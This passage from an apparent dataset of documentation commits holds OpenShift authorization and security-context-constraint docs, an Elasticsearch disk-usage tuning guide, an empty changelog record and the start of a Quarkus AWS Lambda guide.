Policy\nThere are two levels of authorization policy:\n\n[cols=\"1,4\"]\n|===\n\n|*Cluster policy* |link:#roles[Roles] and bindings that are applicable across\nall projects. 
Roles that exist in the cluster policy are considered _cluster\nroles_. Cluster bindings can only reference cluster roles.\n\n|*Local policy* |link:#roles[Roles] and bindings that are scoped to a given\nproject. Roles that exist only in a local policy are considered _local roles_.\nLocal bindings can reference both cluster and local roles.\n\n|===\n\nThis two-level hierarchy allows re-usability over multiple projects through the\ncluster policy while allowing customization inside of individual projects\nthrough local policies.\n\nDuring evaluation, both the cluster bindings and the local bindings are used.\nFor example:\n\n. Cluster-wide \"allow\" rules are checked.\n. Locally-bound \"allow\" rules are checked.\n. Deny by default.\n\n[[roles]]\n\n== Roles\nRoles are collections of policy link:#rules-def[rules], which are sets of\npermitted verbs that can be performed on a set of resources. OpenShift includes\na set of default roles that can be added to users and groups in the\nlink:#cluster-policy-and-local-policy[cluster policy] or in a\nlink:#cluster-policy-and-local-policy[local policy].\n\n[cols=\"1,4\",options=\"header\"]\n|===\n\n|Default Role |Description\n\n|*admin* |A project manager. If used in a\nlink:#cluster-policy-and-local-policy[local binding], an *admin* user will have\nrights to view any resource in the project and modify any resource in the\nproject except for role creation and quota. If the *cluster-admin* wants to\nallow an *admin* to modify roles, the *cluster-admin* must create a\nproject-scoped `*Policy*` object using JSON.\n\n|*basic-user* |A user that can get basic information about projects and users.\n\n|*cluster-admin* |A super-user that can perform any action in any project. When\ngranted to a user within a local policy, they have full control over quota and\nroles and every action on every resource in the project.\n\n|*cluster-status* |A user that can get basic cluster status information.\n\n|*edit* |A user that can modify most objects in a project, but does not have the\npower to view or modify roles or bindings.\n\n|*self-provisioner* |A user that can create their own projects.\n\n|*view* |A user who cannot make any modifications, but can see most objects in a\nproject. 
They cannot view or modify roles or bindings.\n\n|===\n\nTIP: Remember that link:authentication.html#users-and-groups[users\nand groups] can be associated with, or _bound_ to, multiple roles at the same\ntime.\n\nCluster administrators can visualize these roles, including a matrix of the\nverbs and resources each are associated using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-cluster-roles[view\nthe cluster roles].\nendif::[]\nifdef::openshift-dedicated[]\nview the cluster roles.\nendif::[]\nAdditional *system:* roles are listed as well, which\nare used for various OpenShift system and component operations.\n\nBy default in a local policy, only the binding for the *admin* role is\nimmediately listed when using the CLI to\nifdef::openshift-enterprise,openshift-origin[]\nlink:..\/..\/admin_guide\/manage_authorization_policy.html#viewing-local-bindings[view\nlocal bindings].\nendif::[]\nifdef::openshift-dedicated[]\nview local bindings.\nendif::[]\nHowever, if other default roles are added to users and groups within a local\npolicy, they become listed in the CLI output, as well.\n\nIf you find that these roles do not suit you, a *cluster-admin* user can create\na `*policyBinding*` object named `_<projectname>_:default` with the CLI using a\nJSON file. This allows the project *admin* to bind users to roles that are\ndefined only in the `_<projectname>_` local policy.\n\nifdef::openshift-enterprise,openshift-origin[]\n[[updating-cluster-roles]]\n\n=== Updating Cluster Roles\n\nAfter any link:..\/..\/install_config\/upgrading\/index.html[OpenShift cluster\nupgrade], the recommended default roles may have been updated. See\nlink:..\/..\/install_config\/upgrading\/manual_upgrades.html#updating-policy-definitions[Updating\nPolicy Definitions] for instructions on getting to the new recommendations\nusing:\n\n----\n$ oadm policy reconcile-cluster-roles\n----\nendif::[]\n\n[[security-context-constraints]]\n\n== Security Context Constraints\nIn addition to link:#overview[authorization policies] that control what a user\ncan do, OpenShift provides _security context constraints_ (SCC) that control the\nactions that a link:..\/core_concepts\/pods_and_services.html#pods[pod] can\nperform and what it has the ability to access. Administrators can\nlink:..\/..\/admin_guide\/manage_scc.html[manage SCCs] using the CLI.\nSCCs are also very useful for\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[managing\naccess to persistent storage].\n\nSCCs are objects that define a set of conditions that a pod must run with in\norder to be accepted into the system. They allow an administrator to control the\nfollowing:\n\nifdef::openshift-enterprise,openshift-origin[]\n. Running of\nlink:..\/..\/install_config\/install\/prerequisites.html#security-warning[privileged\ncontainers].\nendif::[]\nifdef::openshift-dedicated[]\n. Running of privileged containers.\nendif::[]\n. Capabilities a container can request to be added.\n. Use of host directories as volumes.\n. The SELinux context of the container.\n. The user ID.\n. The use of host namespaces and networking.\n. Allocating an `*FSGroup*` that owns the pod's volumes\n. 
Configuring allowable supplemental groups\n\nSix SCCs are added to the cluster by default, and are viewable by cluster\nadministrators using the CLI:\n\n====\n----\n$ oc get scc\nNAME PRIV CAPS HOSTDIR SELINUX RUNASUSER FSGROUP SUPGROUP PRIORITY\nanyuid false [] false MustRunAs RunAsAny RunAsAny RunAsAny 10\nhostaccess false [] true MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\nhostmount-anyuid false [] true MustRunAs RunAsAny RunAsAny RunAsAny <none>\nnonroot false [] false MustRunAs MustRunAsNonRoot RunAsAny RunAsAny <none>\nprivileged true [] true RunAsAny RunAsAny RunAsAny RunAsAny <none>\nrestricted false [] false MustRunAs MustRunAsRange RunAsAny RunAsAny <none>\n----\n====\n\nThe definition for each SCC is also viewable by cluster administrators using the\nCLI. For example, for the privileged SCC:\n\n====\n----\n# oc export scc\/privileged\n\nallowHostDirVolumePlugin: true\nallowHostIPC: true\nallowHostNetwork: true\nallowHostPID: true\nallowHostPorts: true\nallowPrivilegedContainer: true\nallowedCapabilities: null\napiVersion: v1\nfsGroup: <1>\n type: RunAsAny\ngroups: <2>\n- system:cluster-admins\n- system:nodes\nkind: SecurityContextConstraints\nmetadata:\n annotations:\n kubernetes.io\/description: 'privileged allows access to all privileged and host\n features and the ability to run as any user, any group, any fsGroup, and with\n any SELinux context. WARNING: this is the most relaxed SCC and should be used\n only for cluster administration. Grant with caution.'\n creationTimestamp: null\n name: privileged\npriority: null\nrunAsUser: <3>\n type: RunAsAny\nseLinuxContext: <4>\n type: RunAsAny\nsupplementalGroups: <5>\n type: RunAsAny\nusers: <6>\n- system:serviceaccount:default:registry\n- system:serviceaccount:default:router\n- system:serviceaccount:openshift-infra:build-controller\n----\n\n<1> The `*FSGroup*` strategy which dictates the allowable values for the\nSecurity Context\n<2> The groups that have access to this SCC\n<3> The run as user strategy type which dictates the allowable values for the\nSecurity Context\n<4> The SELinux context strategy type which dictates the allowable values for\nthe Security Context\n<5> The supplemental groups strategy which dictates the allowable supplemental\ngroups for the Security Context\n<6> The users who have access to this SCC\n\n====\n\nThe `*users*` and `*groups*` fields on the SCC control which SCCs can be used.\nBy default, cluster administrators, nodes, and the build controller are granted\naccess to the privileged SCC. All authenticated users are granted access to the\nrestricted SCC.\n\nThe privileged SCC:\n\n- allows privileged pods.\n- allows host directories to be mounted as volumes.\n- allows a pod to run as any user.\n- allows a pod to run with any MCS label.\n- allows a pod to use the host's IPC namespace.\n- allows a pod to use the host's PID namespace.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\nThe restricted SCC:\n\n- ensures pods cannot run as privileged.\n- ensures pods cannot use host directory volumes.\n- requires that a pod run as a user in a pre-allocated range of UIDs.\n- requires that a pod run with a pre-allocated MCS label.\n- allows a pod to use any FSGroup.\n- allows a pod to use any supplemental group.\n\n[NOTE]\n====\nFor more information about each SCC, see the *kubernetes.io\/description*\nannotation available on the SCC.\n====\n\nSCCs are comprised of settings and strategies that control the security features\na pod has access to. 
These settings fall into three categories:\n\n[cols=\"1,4\"]\n|===\n\n|*Controlled by a boolean*\n|Fields of this type default to the most restrictive value. For example,\n`*AllowPrivilegedContainer*` is always set to *false* if unspecified.\n\n|*Controlled by an allowable set*\n|Fields of this type are checked against the set to ensure their value is\nallowed.\n\n|*Controlled by a strategy*\na|Items that have a strategy to generate a value provide:\n\n- A mechanism to generate the value, and\n- A mechanism to ensure that a specified value falls into the set of allowable\nvalues.\n\n|===\n\n=== SCC Strategies\n\n==== RunAsUser\n\n. *MustRunAs* - Requires a `*runAsUser*` to be configured. Uses the configured\n`*runAsUser*` as the default. Validates against the configured `*runAsUser*`.\n. *MustRunAsRange* - Requires minimum and maximum values to be defined if not\nusing pre-allocated values. Uses the minimum as the default. Validates against\nthe entire allowable range.\n. *MustRunAsNonRoot* - Requires that the pod be submitted with a non-zero\n`*runAsUser*` or have the `USER` directive defined in the image. No default\nprovided.\n. *RunAsAny* - No default provided. Allows any `*runAsUser*` to be specified.\n\n==== SELinuxContext\n\n. *MustRunAs* - Requires `*seLinuxOptions*` to be configured if not using\npre-allocated values. Uses `*seLinuxOptions*` as the default. Validates against\n`*seLinuxOptions*`.\n. *RunAsAny* - No default provided. Allows any `*seLinuxOptions*` to be\nspecified.\n\n==== SupplementalGroups\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against all ranges.\n. *RunAsAny* - No default provided. Allows any `*supplementalGroups*` to be\nspecified.\n\n==== FSGroup\n\n. *MustRunAs* - Requires at least one range to be specified if not using\npre-allocated values. Uses the minimum value of the first range as the default.\nValidates against the first ID in the first range.\n. *RunAsAny* - No default provided. Allows any `*fsGroup*` ID to be specified.\n\n\n[[admission]]\n\n=== Admission\n_Admission control_ with SCCs allows for control over the creation of resources\nbased on the capabilities granted to a user.\n\nIn terms of the SCCs, this means that an admission controller can inspect the\nuser information made available in the context to retrieve an appropriate set of\nSCCs. Doing so ensures the pod is authorized to make requests about its\noperating environment or to generate a set of constraints to apply to the pod.\n\nThe set of SCCs that admission uses to authorize a pod are determined by the\nuser identity and groups that the user belongs to. Additionally, if the pod\nspecifies a service account, the set of allowable SCCs includes any constraints\naccessible to the service account.\n\nAdmission uses the following approach to create the final security context for\nthe pod:\n\n. Retrieve all SCCs available for use.\n. Generate field values for security context settings that were not specified\non the request.\n. Validate the final settings against the available constraints.\n\nIf a matching set of constraints is found, then the pod is accepted. If the\nrequest cannot be matched to an SCC, the pod is rejected.\n\nA pod must validate every field against the SCC. 
The following are examples for\njust two of the fields that must be validated:\n\n[NOTE]\n====\nThese examples are in the context of a strategy using the preallocated values.\n====\n\n*A FSGroup SCC Strategy of MustRunAs*\n\nIf the pod defines a `*fsGroup*` ID, then that ID must equal the default\n`*FSGroup*` ID. Otherwise, the pod is not validated by that SCC and the next SCC\nis evaluated. If the `*FSGroup*` strategy is *RunAsAny* and the pod omits a\n`*fsGroup*` ID, then the pod matches the SCC based on `*FSGroup*` (though other\nstrategies may not validate and thus cause the pod to fail).\n\n*A SupplementalGroups SCC Strategy of MustRunAs*\n\nIf the pod specification defines one or more `*SupplementalGroups*` IDs, then\nthe pod's IDs must equal one of the IDs in the namespace's\n*openshift.io\/sa.scc.supplemental-groups* annotation. Otherwise, the pod is not\nvalidated by that SCC and the next SCC is evaluated. If the\n`*SupplementalGroups*` setting is *RunAsAny* and the pod specification omits a\n`*SupplementalGroups*` ID, then the pod matches the SCC based on\n`*SupplementalGroups*` (though other strategies may not validate and thus cause\nthe pod to fail).\n\n==== SCC Prioritization\n\nSCCs have a priority field that affects the ordering when attempting to\nvalidate a request by the admission controller. A higher priority\nSCC is moved to the front of the set when sorting. When the complete set\nof available SCCs are determined they are ordered by:\n\n. Highest priority first, nil is considered a 0 priority\n. If priorities are equal, the SCCs will be sorted from most restrictive to least restrictive\n. If both priorities and restrictions are equal the SCCs will be sorted by name\n\nBy default, the anyuid SCC granted to cluster administrators is given priority\nin their SCC set. This allows cluster administrators to run pods as any\nuser by without specifying a `RunAsUser` on the pod's `SecurityContext`. The\nadministrator may still specify a `RunAsUser` if they wish.\n\n==== Understanding Pre-allocated Values and Security Context Constraints\n\nThe admission controller is aware of certain conditions in the security context\nconstraints that trigger it to look up pre-allocated values from a namespace and\npopulate the security context constraint before processing the pod. Each SCC\nstrategy is evaluated independently of other strategies, with the pre-allocated\nvalues (where allowed) for each policy aggregated with pod specification values\nto make the final values for the various IDs defined in the running pod.\n\nThe following SCCs cause the admission controller to look for pre-allocated\nvalues when no ranges are defined in the pod specification:\n\n. A `*RunAsUser*` strategy of *MustRunAsRange* with no minimum or maximum set.\nAdmission looks for the *openshift.io\/sa.scc.uid-range* annotation to populate\nrange fields.\n. An `*SELinuxContext*` strategy of *MustRunAs* with no level set. Admission\nlooks for the *openshift.io\/sa.scc.mcs* annotation to populate the level.\n. A `*FSGroup*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n. A `*SupplementalGroups*` strategy of *MustRunAs*. Admission looks for the\n*openshift.io\/sa.scc.supplemental-groups* annotation.\n\nDuring the generation phase, the security context provider will default any\nvalues that are not specifically set in the pod. Defaulting is based on the\nstrategy being used:\n\n. 
`*RunAsAny*` and `*MustRunAsNonRoot*` strategies do not provide default\nvalues. Thus, if the pod needs a field defined (for example, a group ID), this\nfield must be defined inside the pod specification.\n. `*MustRunAs*` (single value) strategies provide a default value which is\nalways used. As an example, for group IDs: even if the pod specification defines\nits own ID value, the namespace's default field will also appear in the pod's\ngroups.\n. `*MustRunAsRange*` and `*MustRunAs*` (range-based) strategies provide the\nminimum value of the range. As with a single value `*MustRunAs*` strategy, the\nnamespace's default value will appear in the running pod. If a range-based\nstrategy is configurable with multiple ranges, it will provide the minimum value\nof the first configured range.\n\n[NOTE]\n====\n`*FSGroup*` and `*SupplementalGroups*` strategies fall back to the\n*openshift.io\/sa.scc.uid-range* annotation if the\n*openshift.io\/sa.scc.supplemental-groups* annotation does not exist on the\nnamespace. If neither exist, the SCC will fail to create.\n====\n\n[NOTE]\n====\nBy default, the annotation-based `*FSGroup*` strategy configures itself with a\nsingle range based on the minimum value for the annotation. For example, if your\nannotation reads *1\/3*, the `*FSGroup*` strategy will configure itself with a\nminimum and maximum of *1*. If you want to allow more groups to be accepted for\nthe `*FSGroup*` field, you can configure a custom SCC that does not use the\nannotation.\n====\n\n[NOTE]\n====\nThe *openshift.io\/sa.scc.supplemental-groups* annotation accepts a comma\ndelimited list of blocks in the format of `<start>\/<length` or `<start>-<end>`.\nThe *openshift.io\/sa.scc.uid-range* annotation accepts only a single block.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"947186719ed2c31180cd7b799fff340b7e899724","subject":"[DOCS] Add rollups to `Tune for disk usage` (#60436)","message":"[DOCS] Add rollups to `Tune for disk usage` (#60436)\n\n","repos":"gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/how-to\/disk-usage.asciidoc","new_file":"docs\/reference\/how-to\/disk-usage.asciidoc","new_contents":"[[tune-for-disk-usage]]\n== Tune for disk usage\n\n[discrete]\n=== Disable the features you do not need\n\nBy default Elasticsearch indexes and adds doc values to most fields so that they\ncan be searched and aggregated out of the box. 
For instance if you have a numeric\nfield called `foo` that you need to run histograms on but that you never need to\nfilter on, you can safely disable indexing on this field in your\n<<mappings,mappings>>:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"integer\",\n \"index\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields store normalization factors in the index in order to be\nable to score documents. If you only need matching capabilities on a `text`\nfield but do not care about the produced scores, you can configure Elasticsearch\nto not write norms to the index:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields also store frequencies and positions in the index by\ndefault. Frequencies are used to compute scores and positions are used to run\nphrase queries. If you do not need to run phrase queries, you can tell\nElasticsearch to not index positions:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\nFurthermore if you do not care about scoring either, you can configure\nElasticsearch to just index matching documents for every term. You will\nstill be able to search on this field, but phrase queries will raise errors\nand scoring will assume that terms appear only once in every document.\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false,\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\n[discrete]\n[[default-dynamic-string-mapping]]\n=== Don't use default dynamic string mappings\n\nThe default <<dynamic-mapping,dynamic string mappings>> will index string fields\nboth as <<text,`text`>> and <<keyword,`keyword`>>. This is wasteful if you only\nneed one of them. Typically an `id` field will only need to be indexed as a\n`keyword` while a `body` field will only need to be indexed as a `text` field.\n\nThis can be disabled by either configuring explicit mappings on string fields\nor setting up dynamic templates that will map string fields as either `text`\nor `keyword`.\n\nFor instance, here is a template that can be used in order to only map string\nfields as `keyword`:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"dynamic_templates\": [\n {\n \"strings\": {\n \"match_mapping_type\": \"string\",\n \"mapping\": {\n \"type\": \"keyword\"\n }\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\n[discrete]\n=== Watch your shard size\n\nLarger shards are going to be more efficient at storing data. To increase the size of your shards, you can decrease the number of primary shards in an index by <<indices-create-index,creating indices>> with fewer primary shards, creating fewer indices (e.g. 
by leveraging the <<indices-rollover-index,Rollover API>>), or modifying an existing index using the <<indices-shrink-index,Shrink API>>.\n\nKeep in mind that large shard sizes come with drawbacks, such as long full recovery times.\n\n[discrete]\n[[disable-source]]\n=== Disable `_source`\n\nThe <<mapping-source-field,`_source`>> field stores the original JSON body of the document. If you don\u2019t need access to it, you can disable it. However, APIs that need access to `_source`, such as update and reindex, won\u2019t work.\n\n[discrete]\n[[best-compression]]\n=== Use `best_compression`\n\nThe `_source` and stored fields can easily take a non-negligible amount of disk\nspace. They can be compressed more aggressively by using the `best_compression`\n<<index-codec,codec>>.\n\n[discrete]\n=== Force Merge\n\nIndices in Elasticsearch are stored in one or more shards. Each shard is a Lucene index and made up of one or more segments - the actual files on disk. Larger segments are more efficient for storing data.\n\nThe <<indices-forcemerge,`_forcemerge` API>> can be used to reduce the number of segments per shard. In many cases, the number of segments can be reduced to one per shard by setting `max_num_segments=1`.\n\n[discrete]\n=== Shrink Index\n\nThe <<indices-shrink-index,Shrink API>> allows you to reduce the number of shards in an index. Together with the Force Merge API above, this can significantly reduce the number of shards and segments of an index.\n\n[discrete]\n=== Use the smallest numeric type that is sufficient\n\nThe type that you pick for <<number,numeric data>> can have a significant impact\non disk usage. In particular, integers should be stored using an integer type\n(`byte`, `short`, `integer` or `long`) and floating points should either be\nstored in a `scaled_float` if appropriate or in the smallest type that fits the\nuse-case: using `float` over `double`, or `half_float` over `float` will help\nsave storage.\n\n[discrete]\n=== Use index sorting to colocate similar documents\n\nWhen Elasticsearch stores `_source`, it compresses multiple documents at once\nin order to improve the overall compression ratio. For instance it is very\ncommon that documents share the same field names, and quite common that they\nshare some field values, especially on fields that have a low cardinality or\na https:\/\/en.wikipedia.org\/wiki\/Zipf%27s_law[zipfian] distribution.\n\nBy default documents are compressed together in the order that they are added\nto the index. If you enabled <<index-modules-index-sorting,index sorting>>\nthen instead they are compressed in sorted order. Sorting documents with similar\nstructure, fields, and values together should improve the compression ratio.\n\n[discrete]\n=== Put fields in the same order in documents\n\nDue to the fact that multiple documents are compressed together into blocks,\nit is more likely to find longer duplicate strings in those `_source` documents\nif fields always occur in the same order.\n\n[discrete]\n[[roll-up-historical-data]]\n=== Roll up historical data\n\nKeeping older data can be useful for later analysis but is often avoided due to\nstorage costs. You can use data rollups to summarize and store historical data\nat a fraction of the raw data's storage cost. See <<xpack-rollup>>.\n","old_contents":"[[tune-for-disk-usage]]\n== Tune for disk usage\n\n[discrete]\n=== Disable the features you do not need\n\nBy default Elasticsearch indexes and adds doc values to most fields so that they\ncan be searched and aggregated out of the box. 
For instance if you have a numeric\nfield called `foo` that you need to run histograms on but that you never need to\nfilter on, you can safely disable indexing on this field in your\n<<mappings,mappings>>:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"integer\",\n \"index\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields store normalization factors in the index in order to be\nable to score documents. If you only need matching capabilities on a `text`\nfield but do not care about the produced scores, you can configure Elasticsearch\nto not write norms to the index:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false\n }\n }\n }\n}\n--------------------------------------------------\n\n<<text,`text`>> fields also store frequencies and positions in the index by\ndefault. Frequencies are used to compute scores and positions are used to run\nphrase queries. If you do not need to run phrase queries, you can tell\nElasticsearch to not index positions:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\nFurthermore if you do not care about scoring either, you can configure\nElasticsearch to just index matching documents for every term. You will\nstill be able to search on this field, but phrase queries will raise errors\nand scoring will assume that terms appear only once in every document.\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"properties\": {\n \"foo\": {\n \"type\": \"text\",\n \"norms\": false,\n \"index_options\": \"freqs\"\n }\n }\n }\n}\n--------------------------------------------------\n\n[discrete]\n[[default-dynamic-string-mapping]]\n=== Don't use default dynamic string mappings\n\nThe default <<dynamic-mapping,dynamic string mappings>> will index string fields\nboth as <<text,`text`>> and <<keyword,`keyword`>>. This is wasteful if you only\nneed one of them. Typically an `id` field will only need to be indexed as a\n`keyword` while a `body` field will only need to be indexed as a `text` field.\n\nThis can be disabled by either configuring explicit mappings on string fields\nor setting up dynamic templates that will map string fields as either `text`\nor `keyword`.\n\nFor instance, here is a template that can be used in order to only map string\nfields as `keyword`:\n\n[source,console]\n--------------------------------------------------\nPUT index\n{\n \"mappings\": {\n \"dynamic_templates\": [\n {\n \"strings\": {\n \"match_mapping_type\": \"string\",\n \"mapping\": {\n \"type\": \"keyword\"\n }\n }\n }\n ]\n }\n}\n--------------------------------------------------\n\n[discrete]\n=== Watch your shard size\n\nLarger shards are going to be more efficient at storing data. To increase the size of your shards, you can decrease the number of primary shards in an index by <<indices-create-index,creating indices>> with fewer primary shards, creating fewer indices (e.g. 
by leveraging the <<indices-rollover-index,Rollover API>>), or modifying an existing index using the <<indices-shrink-index,Shrink API>>.\n\nKeep in mind that large shard sizes come with drawbacks, such as long full recovery times.\n\n[discrete]\n[[disable-source]]\n=== Disable `_source`\n\nThe <<mapping-source-field,`_source`>> field stores the original JSON body of the document. If you don\u2019t need access to it you can disable it. However, APIs that needs access to `_source` such as update and reindex won\u2019t work.\n\n[discrete]\n[[best-compression]]\n=== Use `best_compression`\n\nThe `_source` and stored fields can easily take a non negligible amount of disk\nspace. They can be compressed more aggressively by using the `best_compression`\n<<index-codec,codec>>.\n\n[discrete]\n=== Force Merge\n\nIndices in Elasticsearch are stored in one or more shards. Each shard is a Lucene index and made up of one or more segments - the actual files on disk. Larger segments are more efficient for storing data.\n\nThe <<indices-forcemerge,`_forcemerge` API>> can be used to reduce the number of segments per shard. In many cases, the number of segments can be reduced to one per shard by setting `max_num_segments=1`.\n\n[discrete]\n=== Shrink Index\n\nThe <<indices-shrink-index,Shrink API>> allows you to reduce the number of shards in an index. Together with the Force Merge API above, this can significantly reduce the number of shards and segments of an index.\n\n[discrete]\n=== Use the smallest numeric type that is sufficient\n\nThe type that you pick for <<number,numeric data>> can have a significant impact\non disk usage. In particular, integers should be stored using an integer type\n(`byte`, `short`, `integer` or `long`) and floating points should either be\nstored in a `scaled_float` if appropriate or in the smallest type that fits the\nuse-case: using `float` over `double`, or `half_float` over `float` will help\nsave storage.\n\n[discrete]\n=== Use index sorting to colocate similar documents\n\nWhen Elasticsearch stores `_source`, it compresses multiple documents at once\nin order to improve the overall compression ratio. For instance it is very\ncommon that documents share the same field names, and quite common that they\nshare some field values, especially on fields that have a low cardinality or\na https:\/\/en.wikipedia.org\/wiki\/Zipf%27s_law[zipfian] distribution.\n\nBy default documents are compressed together in the order that they are added\nto the index. If you enabled <<index-modules-index-sorting,index sorting>>\nthen instead they are compressed in sorted order. 
Sorting documents with similar\nstructure, fields, and values together should improve the compression ratio.\n\n[discrete]\n=== Put fields in the same order in documents\n\nDue to the fact that multiple documents are compressed together into blocks,\nit is more likely to find longer duplicate strings in those `_source` documents\nif fields always occur in the same order.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e725b65aea32d8fa77dd33e2a579941694c395c","subject":"Update changelog","message":"Update changelog\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8d524c390080a4d8cb37de8b74c83ff7ad826f8","subject":"Fix paths for libsunec.so and cacerts (SSL reqs)","message":"Fix paths for libsunec.so and cacerts (SSL reqs)\n\nDocker commands for the additional requirements for client SSL were no longer working with 20.2.0-java11 image.","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/amazon-lambda.adoc","new_file":"docs\/src\/main\/asciidoc\/amazon-lambda.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Amazon Lambda\n:extension-status: preview\n\ninclude::.\/attributes.adoc[]\n\nThe `quarkus-amazon-lambda` extension allows you to use Quarkus to build your AWS Lambdas.\nYour lambdas can use injection annotations from CDI or Spring and other Quarkus facilities as you need them.\n\nQuarkus lambdas can be deployed using the Amazon Java Runtime, or you can build a native executable and use\nAmazon's Custom Runtime if you want a smaller memory footprint and faster cold boot startup time.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 30 minutes\n* JDK 11 (AWS requires JDK 1.8 or 11)\n* Apache Maven {maven-version}\n* https:\/\/aws.amazon.com[An Amazon AWS account]\n* https:\/\/docs.aws.amazon.com\/cli\/latest\/userguide\/cli-chap-install.html[AWS CLI]\n* https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI], for local testing\n\nNOTE: For Gradle projects please <<gradle,see below>>, or for further reference consult the guide in the link:gradle-tooling[Gradle setup page].\n\n== Getting Started\n\nThis guide walks you through generating an example Java project via a maven archetype and deploying it to AWS.\n\n== Installing AWS bits\n\nInstalling all the AWS bits is probably the most difficult thing about this guide. 
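Once you have followed the official installation steps, a quick way to confirm that the CLIs are installed and on your PATH (a sanity check only; the reported versions will vary) is to print their versions:\n\n[source,bash]\n----\naws --version\nsam --version\n----\n\n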
Make sure that you follow all the steps\nfor installing AWS CLI.\n\n== Creating the Maven Deployment Project\n\nCreate the Quarkus AWS Lambda maven project using our Maven Archetype.\n\n\n[source,bash,subs=attributes+]\n----\nmvn archetype:generate \\\n -DarchetypeGroupId=io.quarkus \\\n -DarchetypeArtifactId=quarkus-amazon-lambda-archetype \\\n -DarchetypeVersion={quarkus-version}\n----\n\n[NOTE]\n====\nIf you prefer to use Gradle, you can quickly and easily generate a Gradle project via https:\/\/code.quarkus.io\/[code.quarkus.io]\nadding the `quarkus-amazon-lambda` extension as a dependency.\n\nCopy the build.gradle, gradle.properties and settings.gradle into the above generated Maven archetype project, to follow along with this guide.\n\nExecute: gradle wrapper to setup the gradle wrapper (recommended).\n\nThe dependency for `quarkus-test-amazon-lambda` will also need to be added to your build.gradle.\n\nFor full Gradle details <<gradle, see below>>.\n====\n\n[[choose]]\n== Choose Your Lambda\n\nThe `quarkus-amazon-lambda` extension scans your project for a class that directly implements the Amazon `RequestHandler<?, ?>` or `RequestStreamHandler` interface.\nIt must find a class in your project that implements this interface or it will throw a build time failure.\nIf it finds more than one handler class, a build time exception will also be thrown.\n\nSometimes, though, you might have a few related lambdas that share code and creating multiple maven modules is just\nan overhead you don't want to do. The `quarkus-amazon-lambda` extension allows you to bundle multiple lambdas in one\nproject and use configuration or an environment variable to pick the handler you want to deploy.\n\nThe generated project has three lambdas within it. Two that implement the `RequestHandler<?, ?>` interface, and one that implements the `RequestStreamHandler` interface. One that is used and two that are unused. If you open up\n`src\/main\/resources\/application.properties` you'll see this:\n\n[source,properties,subs=attributes+]\n----\nquarkus.lambda.handler=test\n----\n\nThe `quarkus.lambda.handler` property tells Quarkus which lambda handler to deploy. This can be overridden\nwith an environment variable too.\n\nIf you look at the three generated handler classes in the project, you'll see that they are `@Named` differently.\n\n[source,java,subs=attributes+]\n----\n@Named(\"test\")\npublic class TestLambda implements RequestHandler<InputObject, OutputObject> 